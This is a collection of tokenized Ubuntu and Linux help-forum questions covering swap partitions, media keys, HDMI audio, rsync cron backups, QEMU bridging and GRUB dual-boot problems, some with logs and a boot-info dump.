521113	looking for swap partition	how do i know i have a swap partition or not ? i have a dual boot ubuntu and windows 8 . during ubuntu installation steps i choice `` install ubuntu alongside windows 8 '' option . does swap partition is created automatically by installation or not ? if it 's not created how can i create that ? here is the screen shot of gparted :
521114	xf86mediaplay button does n't work on remote but does on keyboard	i have an emprex 1100 remote for controlling media , which i love . since upgrading to 14.04 the play button on it no longer works but i ca n't understand why . all the other buttons work as before . a button on my keyboard with an identical keycode works fine . i also can not use ccsm to remap xf86audioplay to xdotool key xf86audioplay and make it work , but can remap other working keys ( i am currently using `` pause '' remapped to xdotool key xf86audioplay ) . this is the xev log for the remote : keypress event , serial 37 , synthetic no , window 0x4c00001 , root 0x25c , subw 0x0 , time 39090385 , ( 1055,738 ) , root : ( 2800,790 ) , state 0x10 , keycode 215 ( keysym 0x1008ff14 , xf86audioplay ) , same_screen yes , xkeysymtokeycode returns keycode : 172 xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x4c00001 , root 0x25c , subw 0x0 , time 39090497 , ( 1055,738 ) , root : ( 2800,790 ) , state 0x10 , keycode 215 ( keysym 0x1008ff14 , xf86audioplay ) , same_screen yes , xkeysymtokeycode returns keycode : 172 xlookupstring gives 0 bytes : xfilterevent returns : false and this is what happens when i press the same ( working ) button on the keyboard focusout event , serial 37 , synthetic no , window 0x4c00001 , mode notifygrab , detail notifyancestor focusin event , serial 37 , synthetic no , window 0x4c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 37 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 37 , synthetic no , window 0x4c00001 , root 0x25c , subw 0x0 , time 39091783 , ( 1055,738 ) , root : ( 2800,790 ) , state 0x10 , keycode 172 ( keysym 0x1008ff14 , xf86audioplay ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false this is what happens when i use a working button on the remote : keymapnotify event , serial 37 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 37 , synthetic no , window 0x4c00001 , root 0x25c , subw 0x0 , time 39324425 , ( 369,751 ) , root : ( 2114,803 ) , state 0x10 , keycode 173 ( keysym 0x1008ff16 , xf86audioprev ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false why is there a difference and how can i fix it ?
521116	black laptop monitor when booting with two monitor	everything is working fine if i connect my external laptop . mint autodetects it , and set the right resolution . but if i boot the laptop with the external monitor connected , mint will detect only the external monitor and leaves the laptop display black . even if i disconnect the external display , the laptop display wo n't be activated and i ca n't do anything other than reboot . is there anything i can do to be able to boot with my external monitor connected and have the same behaviour i would have if i just connect it with the os already booted ? i 'm using linux mint 17 with an asus zenbook ux31a , what means i have a integrated intel速 hd graphics 4000 .
521117	inconsistent hdmi sound control ( `` normal '' sound settings vs pulse audio volume control )	at first , in the standard ubuntu sound settings , no hdmi sound out option was available when having a tv connected to my notebook . i 've solved this problem using pulseaudio volume control , where i could select hdmi sound . it worked fine until i was using another tv a couple of days ago and there were no such hdmi sound out available anymore in pulse audio . after rebooting and plugging the hdmi cable like a thousand times i had the idea to look at ubuntu 's standard sound control and there i could select hdmi like it should be . makes me ask the question : why is this happening ? does it have to do with the plugged tv ? is there anything i can do to not have this happening again ? i dont wan na search the audio switch option everytime ( i have a notebook with hybrid graphics nvidia/intel , i use to have the nvidia graphics card activated all the time using nvidia-prime , ubuntu version is 14.04 )
521118	not able to see scsi hdd contents	i installed kubuntu 11.0 oh nsata hdd and connected a scsi hdd to it.now kubuntu is working fine , but i am unable to see the data available in the scsi hdd.can someone help me here . root @ sibi-desktop : ~ # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000f359d device boot start end blocks id system /dev/sda1 * 2048 972599295 486298624 83 linux /dev/sda2 972601342 976771071 2084865 5 extended /dev/sda5 972601344 976771071 2084864 82 linux swap / solaris root @ sibi-desktop : ~ #
521119	running .jar file using jdk on ubuntu 14.04	i install jdk on my ubuntu 14.04 so i can use netbeans and android studio . i download a .jar file in the internet and i want to run it on my pc . my problem is , i can not find java to run this file . i already allow executing file as a program . do i need to install java run time ? cause , as far as it is said here , jdk already contains jre . http : //stackoverflow.com/a/1906455
521120	directories under /proc directory	when i tried $ ls /proc , i found a lot of directories ( numbered - for pid and other subdirectories ... ) as follows : i am describing only some of the numbered subdirectories , and other subdirectories $ ls /proc 129 1475 1899 2 21 2302 ( pid's-correct me if i am wrong ) acpi , asound , bus , driver , fs , ipmi , irq , mounts , net , scsi , self , sys , sysvipc , tty ( other subdirecories ) , and when i tried $ ls - l /proc it displayed some - > character in it : $ ls -l /proc lrwxrwxrwx . 1 root root 11 sep 7 17:06 mounts - > self/mounts lrwxrwxrwx . 1 root root 8 sep 7 17:06 net - > self/net lrwxrwxrwx . 1 root root 0 sep 7 2014 self - > 4806 here in access specifier full access is there ( lrwxrwxrwx ) , my question is : what does l specify here in lrwxrwxrwx what does these - > character means ? like in ( mounts - > self/mounts , net - > self/net , self - > 4806 etc . )
521124	my tweaks keeps reseting after restarting when using unity tweak tool	i am having trouble with unity tweak tool , whenever i reboot my computer on ubuntu 14.04 , all the settings ( hot corners , workspace settings ... etc ) is not working anymore . i tried searching on google a few times but i could n't find a solution . *edit : earlier , i installed both ubuntu tweak and unity tweak tool , then i removed ubuntu tweak believing that it would solve the problem . but it did n't .
521130	not showing pre-installed windows 7 partition while installing ubuntu 14.04	first i installed windows 7 on 200gb as c drive of the 1tb hard disk and after that i tried to install ubuntu 14.04 along side windows-7 but it is not showing windows-7 partition but showing whole 1tb hard disk as an unallocated disk . i read many bugs but could not found the exact answer of my problem . i have one 100mb system reserved ntfs file system and two primary partition as : 200gb c-drive primary partition ( boot file etc . ) , 2 gb hp_tools fat32 primary partition and remaining 730gb as unallocated space screenshot from comments :
521132	samsung tv serial commands with python	i have a samsung plasma display that i use a python script to turn on and off with its serial interface . ( ex-link ) . import time , serial ser = serial.serial ( port='/dev/ttyusb0 ' , baudrate=9600 , timeout=1 ) ser.write ( `` \x08\x22\x00\x00\x00\x00\xd4 '' ) ser.close ( ) how can i have this check if the tv responded and continue to try until it does for a limited amount of time . this is a toggle command so it cant just keep trying . the tv responds with three bytes 03 0c f1 if it successfully receives the command .
521133	blinking screen in ubuntu 14.04	after a fresh install of ubuntu 14.04 , the screen of my laptops blinks persistently ( it turns on and off all the time ) . i 'm not versed at linux at all , but i 've searched a lot of forums and tried different things without success ( for instance , see here ) . i had ubuntu 12.04 lts and everything worked just fine . i did an upgrade to 14.04 and everything worked fine at the begginig but , after the first automatic update -through the software updater- the problem started . please help ! some relevant video-card info : lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs690m [ radeon xpress 1200/1250/1270 ]
521135	can not restore a saved machine	i can not restore a saved machine with both virt-manager and the virtsh restore command : laurent @ aspire6930g : /var/lib/libvirt/qemu/save $ sudo virsh restore windows7.save erreurâ : impossible de restaurer le domaine depuis windows7.save erreurâ : internal error : can not load apparmor profile 'libvirt-df3939ed-3ba9-12f4-b382-8f4337f9ddc6' i googled a lot about it but without help . is it anything special i forgot to configure ?
521136	will my os be formatted if i partition my home directory in recovery mode ?	will my os be formatted if i partition my home directory in recovery mode ? the question is for ubuntu 14.04 .
521138	no boot menu after boot repair	an error occurred during the repair . please write on a paper the following url : http : //paste2.org/0jwfnysa in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . please do not forget to make your bios boot on sda ( 1000gb ) disk ! please disable secureboot in the bios . the boot files of [ the os now in use - ubuntu 14.04.1 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition )
521139	i installed ubuntu 14.04.1 but i can boot it only in recovery mode..why ?	my system config : 2gb ram , amd sempron 145 processor-2.8ghz i installed 32-bit ubuntu first alongside windows and i can open it in recovery mode only , later i removed it and installed 64-bit ubuntu still the result is same..plz help me out ... . is there any problem with processor ? ?
521140	i created a torrent but it can not be downloaded	i created a torrent via transmission , the source file is in my downloads folder , but it can not be downloaded to any device . magnet link opens torrent , but torrent does n't start downloading . magnet link : magnet : ? xt=urn : btih:6c5338c89df412e9ee43a73bae5706c79630d0ad & dn=not % 5fdefteri321.tar.gz & tr=udp % 3a % 2f % 2ftracker.openbittorrent.com % 3a80 % 2fannounce
521142	why is this rsync + ssh cron job giving me 'permission denied ( publickey ) ' errors ?	i make frequent backups to a local drive which i want to sync daily to a remote server . the target server is configured for ssh key ( no password ) access only . since my primary ssh key for that server is passphrase-protected , i 've created a second ssh key ( not passphrase protected ) + user to use for unattended backups - this way i do not have to be present to enter my passphrase when cron runs . i 'm using cron and rsync , and all of the commands work individually , but fail when combined . the furthest i 've got while troubleshooting is running env -i sh -c `` rsync -lrstro -- delete -- exclude 'lost+found ' /backups/auto-daily-backups/./ backups-only @ xx.xx.xx.xx : /backups/desktop/ '' which returns the error permission denied ( publickey ) . rsync : connection unexpectedly closed ( 0 bytes received so far ) [ sender ] rsync error : unexplained error ( code 255 ) at io.c ( 226 ) [ sender=3.1.0 ] any tips on how to troubleshoot this further ? here 's what i 've tried so far and i 'm out of ideas : cron is definitely running ps aux | grep cron nothing unusual in /var/log/syslog sep 7 13:22:01 desktop cron [ 6735 ] : ( tom ) cmd ( sh /home/tom/documents/scripts/offsite-backup ) ssh in terminal to remote server as the backup user works ssh backups-user @ xx.xx.xx.xx running the command in terminal works perfectly rsync -lrstro -- delete -- exclude 'lost+found ' /backups/auto-daily-backups/./ backups-only @ xx.xx.xx.xx : /backups/desktop/ manually specifying the path to the backups-user key has no effect rsync -lrstro -- delete -- exclude 'lost+found ' -e 'ssh -i /home/tom/.ssh/backups-only ' /backups/auto-daily-backups/./ backups-only @ xx.xx.xx.xx : /backups/desktop/ replacing the non-functioning command with a simple test command works echo `` hello world '' > ~/desktop/test.txt shouting/swearing at the computer had no effect ( but made me feel better temporarily ) . edit 1 : here 's my crontab file and the script it calls . ... # m h dom mon dow command mailto= '' '' * * * * * sh /home/tom/documents/scripts/offsite-backup and # ! /bin/bash rsync -lrstro -- delete -- exclude 'lost+found ' /backups/auto-daily-backups/./ backups-only @ xx.xx.xx.xx : /backups/desktop/ edit 2 : just to clarify , /var/log/auth.log on the target server contains the line sep 11 08:23:01 < hostname > cron [ 24421 ] : pam_unix ( cron : session ) : session closed for user root this is confusing because i 'm no longer running cron every minute locally , but a new entry still appears every minute in the server logs . crontab files for all users ( including root ) on the server are empty & do nothing . also , user 'backups-only ' was created only on the server and with limited rights , with a dedicated ssh key copied to my desktop machine . i 'm assuming this is the way to go because everything works when running the commands manually . the crontab file posted above is for me , user 'tom ' on my desktop machine . my intent is to have it call the script which should log in to the server as user 'backups-only ' . i just tried running the backup script ( rather than the command inside it ) and it successfully connected & worked . i ran it on my desktop as user 'tom ' , same user who created the cron job that wo n't work . here 's the output from the server log corresponding with that successful login sep 11 08:35:31 < hostname > sshd [ 25071 ] : error : could not load host key : /etc/ssh/ssh_host_ed25519_key sep 11 08:35:32 < hostname > sshd [ 25071 ] : accepted publickey for backups-only from < desktop ip > port 54242 ssh2 : rsa e2 : e6:07:27 : c1 : continues ... sep 11 08:35:32 < hostname > sshd [ 25071 ] : pam_unix ( sshd : session ) : session opened for user backups-only by ( uid=0 ) sep 11 08:35:32 < hostname > systemd-logind [ 638 ] : new session 12 of user backups-only . sep 11 08:36:00 < hostname > sshd [ 25133 ] : received disconnect from < desktop ip > : 11 : disconnected by user sep 11 08:36:00 < hostname > sshd [ 25071 ] : pam_unix ( sshd : session ) : session closed for user backups-only
521143	why must write 'br0 ' in route table to restore host 's internet connection ? ( with qemu & tap )	that 's a long story ... . but at first , i have to confess that my reputation is less than 15 so i ca n't give you a '+1 ' . i need to set up several qemu instances . one of them is a primary node , which has two interfaces - one for external connection and the other one for local network to other nodes . other nodes only have one interface with connection to the primary one . before starting up the qemu instances , i set up two bridges , some taps and made the configuration . the first bridge connects host eth0 and tap0 . the second bridge connects all other taps . all interfaces and bridges were up by ip link set xxxx up . i 've set up the primary node by kvm -hda xxx -device e1000 , netdev=a , mac=yyy -netdev tap , id=a , ifname=tap0 , script=no , downscript=no -device e1000 , netdev=b , mac=zzz -netdev tap , id=b , ifname=tap1 , script=no , downscript=no -m www . please notice that it set up two interfaces in the primary node - the former one lay close to eth0 on br0 , and the latter one lay on br1 with other taps . other nodes were set up by the latter half of that command . no problem in this part so i just omit . i updated all /etc/network/interfaces files in all node to make the connection work well . then i found everything was fine : the primary could both connect to the outside world and ping to other nodes . but ... ... my host lost its internet connection ! ! ! ! ! ! ! after some tries , i made all things ok by updating the routing table on the host by replacing the dev value with br0 which is eth0 before . thanks for your patience . here is the question : why need i update the route table entry by replace the eth0 value to br0 ? i just guessed that something might by wrong in route table and did that ... .. please be aware that before updating the host route table , the primary node can ping the hosts outside the subnet successfully ( such as www.baidu.com ) . just the host lost the internet connection . the host /etc/network/interfaces is not modified - it just defines eth0 dhcp and lo loopback . fyi , i just update my 12.04 to 14.04 . this happened at 14.04 .
521144	`` ^ '' key in lyx suddenly does not work	i used to be able to use the `` ^ '' to get to the superscript in math mode without problems . now when i press the key nothing happens . as you can see i can write the `` ^ '' without problems in a text but not in lyx . does anybody know what seems to be the problem ? i am using kubuntu 14.04 with lyx 2.0.6 .
521145	how to install oracle java on ubuntu 14.04 ?	i am using ubuntu 14.04.1 lts , x64 architecture , and i specifically need to install oracle java . now i know there are some instructions on the website which i follow but the same website does not recognize it . can any one please help me with some instructions ? thanks !
521147	boot windows 8 from another disk	i 'm trying to add a windows 8 ssd to the boot menu . but what i only have achieved is a blank screen after selecting the custom menu entry for windows 8 . i 've no problems to boot windows 8 when i switch the boot order by using the uefi . this is my custom menu entry : menuentry `` windows 8 '' -- class windows -- class os { insmod part_msdos set root= ' ( hd1 ) ' drivemap -s hd0 hd1 chainloader ( hd1 ) +1 } here is the output from boot info script : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb2 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi sdb3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sdb4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 216,768,511 216,766,464 83 linux /dev/sda2 216,770,558 250,068,991 33,298,434 5 extended /dev/sda5 216,770,560 250,068,991 33,298,432 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 128.0 gb , 128035676160 bytes 256 heads , 63 sectors/track , 15505 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sdb1 ends after the last sector of /dev/sdb guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 2,048 616,447 614,400 windows recovery environment ( windows ) /dev/sdb2 616,448 821,247 204,800 efi system partition /dev/sdb3 821,248 1,083,391 262,144 microsoft reserved partition ( windows ) /dev/sdb4 1,083,392 225,062,911 223,979,520 data partition ( windows/linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 a9021806-ff94-4422-8272-42cc96a25771 ext4 /dev/sda5 4c4e44af-28a9-46fa-85fd-f416bfaf92cd swap /dev/sdb1 5220b52f20b51ac5 ntfs wiederherstellung /dev/sdb2 1ab6-57ac vfat /dev/sdb4 b632c3b732c37b3f ntfs ================================ mount points : ================================= device mount_point type options /dev/sda1 / ext4 ( rw , noatime , discard , errors=remount-ro ) /dev/sdb1 /media/user/wiederherstellung fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb4 /media/user/b632c3b732c37b3f fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=countdown set timeout=10 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- verbose -- interruptible 10 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-a9021806-ff94-4422-8272-42cc96a25771 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi linux /boot/vmlinuz-3.13.0-35-generic root=uuid=a9021806-ff94-4422-8272-42cc96a25771 ro initrd /boot/initrd.img-3.13.0-35-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-a9021806-ff94-4422-8272-42cc96a25771 ' { menuentry 'ubuntu , with linux 3.13.0-35-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-35-generic-advanced-a9021806-ff94-4422-8272-42cc96a25771 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi echo 'loading linux 3.13.0-35-generic ... ' linux /boot/vmlinuz-3.13.0-35-generic root=uuid=a9021806-ff94-4422-8272-42cc96a25771 ro echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-35-generic } menuentry 'ubuntu , with linux 3.13.0-35-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-35-generic-recovery-a9021806-ff94-4422-8272-42cc96a25771 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi echo 'loading linux 3.13.0-35-generic ... ' linux /boot/vmlinuz-3.13.0-35-generic root=uuid=a9021806-ff94-4422-8272-42cc96a25771 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-35-generic } menuentry 'ubuntu , with linux 3.11.0-26-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-26-generic-advanced-a9021806-ff94-4422-8272-42cc96a25771 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi echo 'loading linux 3.11.0-26-generic ... ' linux /boot/vmlinuz-3.11.0-26-generic root=uuid=a9021806-ff94-4422-8272-42cc96a25771 ro echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-26-generic } menuentry 'ubuntu , with linux 3.11.0-26-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-26-generic-recovery-a9021806-ff94-4422-8272-42cc96a25771 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi echo 'loading linux 3.11.0-26-generic ... ' linux /boot/vmlinuz-3.11.0-26-generic root=uuid=a9021806-ff94-4422-8272-42cc96a25771 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-26-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9021806-ff94-4422-8272-42cc96a25771 else search -- no-floppy -- fs-uuid -- set=root a9021806-ff94-4422-8272-42cc96a25771 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry `` windows 8 '' -- class windows -- class os { insmod part_msdos set root= ' ( hd1 ) ' drivemap -s hd0 hd1 chainloader ( hd1 ) +1 } # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=a9021806-ff94-4422-8272-42cc96a25771 / ext4 discard , noatime , errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=4c4e44af-28a9-46fa-85fd-f416bfaf92cd none swap sw 0 0 # temporary directories as tmpfs tmpfs /tmp tmpfs defaults , noatime , mode=1777 , size=2g 0 0 tmpfs /var/log tmpfs defaults , noatime , mode=1777 , size=128m 0 0 # external device -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sdb2 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 02 fe 19 |.x.msdos5.0 ... ..| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 68 09 00 | ... ... .. ? ... .h..| 00000020 00 20 03 00 01 03 00 00 00 00 00 00 02 00 00 00 | . ... ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 ac 57 b6 1a 4e 4f 20 4e 41 4d 45 20 20 |.. ) .w..no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 